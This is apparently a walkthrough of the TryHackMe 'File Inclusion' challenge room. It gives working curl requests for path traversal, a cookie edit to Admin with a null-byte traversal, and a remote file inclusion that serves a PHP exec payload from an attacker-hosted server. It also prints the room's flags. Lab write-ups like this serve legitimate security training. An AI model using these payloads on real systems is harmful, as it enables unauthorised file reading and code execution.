File Inclusion - Tryhackme | Challenge Part

This writeup contains the solution for Tryhackme — File Inclusion challenges section.

Efe D

~4 min read · May 18, 2026 (Updated: May 18, 2026) · Free: Yes

Question 1: Capture Flag1 at /etc/flag1

We move to http://target/challenges/chall1.php

As seen in the image, it won't work when we click Include button as the form sends the input to the server via GET request (we can see it via the code of the website with view-source or Developer Tools > Network), therefore, we need to use POST request. To do so, we can use curl:

curl -X POST 'http://target/challenges/chall1.php' -H 'Content-Type: application/x-www-form-urlencoded' -d 'file=../../../../etc/flag1'

Afterwards, we can find the flag in the output: F1x3d-iNpu7-f0rrn

Question 2: Capture Flag2 at /etc/flag2

We move to http://target/challenges/chall2.php

As seen in the image, we can't access as we are not Admin. Therefore, we need to find the authentication method and bypass it. To do so, right click to anywhere in the page and click Inspect so we can use Developer Tools.

Since we need to see Network tab on Developer Tools, refresh the page one time so it will be loaded. Afterwards, click on chall2.php:

and go to cookies section:

Now we see that there is a cookie as THM: "Guest":

If the authentication goes through Cookies, we can manipulate it through Developer Tools. To do so, go to Storage section on Developer Tools:

Click on Cookies > TargetIP area:

Now double click on "Value":

And change it as Admin, afterwards, refresh the page.

We have now bypassed the authorization check, however, still no flag.

As seen in the warnings, we can understand that there's an include function that works as include(includes/cookie.php) then, we can set cookie via Developer Tools > Storage as ../../../../etc/flag2%00, and refresh again to get the flag: c00k13_i5_yuMmy1

We have to use %00 (null byte) since function adds .php automatically, as we can also see in the second warning, php version is not +5.3.4 (its 5.2), therefore the null byte is not patched.

Question 3: Capture Flag3 at /etc/flag3

We move to http://target/challenges/chall3.php

Now when we try the filename ../../../../etc/flag3, we analyze the warning:

It says include(etcflag.php — so "." and "/" are removed), we continue to bypass it by using ….//….//….//….//etc/flag3, to see if the server removes "../" only or "." and "/", as at first case, this entry should work.

The error is same again, this ensures that server removes "." and "/" inputs.

Now when we look at the form source using Ctrl+U, we can see that the form sends a GET request. If the server reads the input using $_REQUEST, it may accept the file parameter not only from the URL query string ($_GET), but also from POST data ($_POST) or cookies ($_COOKIE). Since we could not bypass the validation applied to the URL query parameter, we can try sending the file parameter in the POST body using curl.

curl --output - -X POST 'http://target/challenges/chall3.php' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'file=../../../etc/flag3%00'

Afterwards, we can find the flag in the output: P0st_1s_w0rk1in9

Question4: Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

First, we can create a test.php file on our attack machine with the content: <?php echo exec("hostname"); ?>

For RFI, we will need to host a web server to give the URL to the target. We can host a webserver via terminal with Python3: python3 -m http.server 8000

Now, http://attackmachineIP:8000/test.php will be accessible by target server.

Go to file inclusion lab now and submit http://attackmachineIP:8000/test.php:

Now we see the flag in the output: lfi-vm-thm-f8c5b1a78692

#file-inclusion #remote-file-inclusion #tryhackme #tryhackme-walkthrough